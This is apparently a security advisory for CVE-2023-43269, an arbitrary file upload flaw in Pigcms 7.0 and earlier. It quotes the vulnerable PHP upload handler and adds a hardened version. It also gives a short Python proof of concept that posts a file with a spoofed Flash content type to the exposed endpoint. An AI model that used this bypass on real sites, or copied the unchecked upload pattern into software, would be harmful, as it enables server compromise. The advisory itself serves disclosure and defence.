CVE-2023-43269: Pigcms vulnerability testing · Issue #1 · pwnero/vul
Pigcms up to and including version 7.0 was discovered to contain an arbitrary file upload vulnerability.
Product Name:
Pigcms
Affected version:
<=7.0
CVE ID:
CVE-2023-43269
Vulnerability Type:
Arbitrary File Upload
Description
1. Root Cause
In the file /cms/manage/modules/manage/background.php, the action_flashUpload function is the trigger point for the vulnerability. A file is stored when two conditions are met: the multipart field name is "filePath", and the Content-Type declared for that part is one of the Flash types the function accepts (application/x-shockwave-flash, application/octet-stream or video/x-flv). Both values are supplied by the client. The file suffix is not filtered at all, so any file type can be uploaded: the suffix of the stored file is taken directly from the suffix of the submitted filename.
```php
public function action_flashUpload(){
    $rt=0;
    $filePath='';
    if (isset($_FILES['filePath'])){
        $flash=$_FILES['filePath'];
        // Only the client-supplied Content-Type of the part is checked
        if ($flash['type']!='application/x-shockwave-flash'&&$flash['type']!='application/octet-stream'&&$flash['type']!='video/x-flv'){
            echo '您上传的不是flash:'.$flash['type'];
        }elseif ($flash['size']>50000000) {
            echo '您上传的文件不能超过50M';
        }else {
            $filename=$flash['name'];
            // The stored suffix is whatever follows the last dot of the client filename
            $nameInfos=explode('.',$filename);
            $nameInfosCount=count($nameInfos);
            $subfix=$nameInfos[$nameInfosCount-1];
            $time=SYS_TIME;
            $rand=randStr(4);
            $year=date('Y',$time);
            $month=date('m',$time);
            $day=date('d',$time);
            $pathInfo=upFileFolders($time);
            $dstFolder=$pathInfo['path'];
            $abspath=$dstFolder.$time.$rand.'.'.$subfix;
            $location=MAIN_URL_ROOT.'/upload/images/'.$year.'/'.$month.'/'.$day.'/'.$time.$rand.'.'.$subfix;
            move_uploaded_file($flash['tmp_name'],$abspath); //delete the temporary file
            echo $location;
        }
    }else {
        echo '您上传的不是flash';
    }
}
```
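As an added example that is not Pigcms code, the following is a hardened form of the same handler's checks: the extension is taken from an allowlist, the first bytes of the file are verified instead of trusting the client-supplied Content-Type, and the stored name is generated server-side. The function name safe_flash_upload, the $uploadDir parameter and the UPLOAD_ROOT constant are assumptions.

```php
<?php
// Added example (not Pigcms code): a hardened replacement for the checks in
// action_flashUpload. safe_flash_upload(), $uploadDir and UPLOAD_ROOT are assumed names.

// Extensions this handler is willing to store, lowercase.
const FLASH_ALLOWED_EXT = ['swf', 'flv'];

// Leading bytes of the formats the handler claims to accept:
// SWF files start with FWS/CWS/ZWS, FLV files with "FLV".
const FLASH_MAGIC = ['FWS', 'CWS', 'ZWS', 'FLV'];

function safe_flash_upload(array $file, string $uploadDir): ?string
{
    // Reject anything PHP did not receive through the upload mechanism.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    if ($file['size'] > 50000000) {
        return null;
    }
    // Extension must be on the allowlist; the client name alone never decides it.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, FLASH_ALLOWED_EXT, true)) {
        return null;
    }
    // Check the content itself; $_FILES[...]['type'] is attacker-controlled.
    $fh = fopen($file['tmp_name'], 'rb');
    $head = $fh ? fread($fh, 3) : '';
    if ($fh) {
        fclose($fh);
    }
    if (!in_array($head, FLASH_MAGIC, true)) {
        return null;
    }
    // Server-generated name: no user-controlled characters reach the path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dst = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dst)) {
        return null;
    }
    return $name;
}

// Usage inside the controller (same request shape as the original handler):
// $stored = safe_flash_upload($_FILES['filePath'] ?? [], UPLOAD_ROOT . '/flash');
// if ($stored === null) { http_response_code(400); echo 'invalid upload'; }
```

Disabling script execution for the upload directory is a separate web-server setting and is not shown here.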
Two files are needed to exploit this vulnerability: test.txt (any suffix can be uploaded) and the POC script, stored in the same directory; then run the POC.
POC:
```python
import requests

goal = "http://<target-host>"  # placeholder: base URL of the Pigcms instance under test

def test_url(url):
    exp = "/cms/manage/admin.php?m=manage&c=background&a=action_flashUpload"
    # The part is named filePath and declares a Flash content type;
    # the stored suffix comes from the filename (report.txt)
    files = {'filePath': ('report.txt', open('test.txt', 'rb'), 'video/x-flv', {'Expires': '0'})}
    re_q = requests.post(url + exp, files=files, allow_redirects=False)
    if re_q.status_code == 302:
        print(re_q.text)

test_url(goal)
```
Impact:
Arbitrary file upload.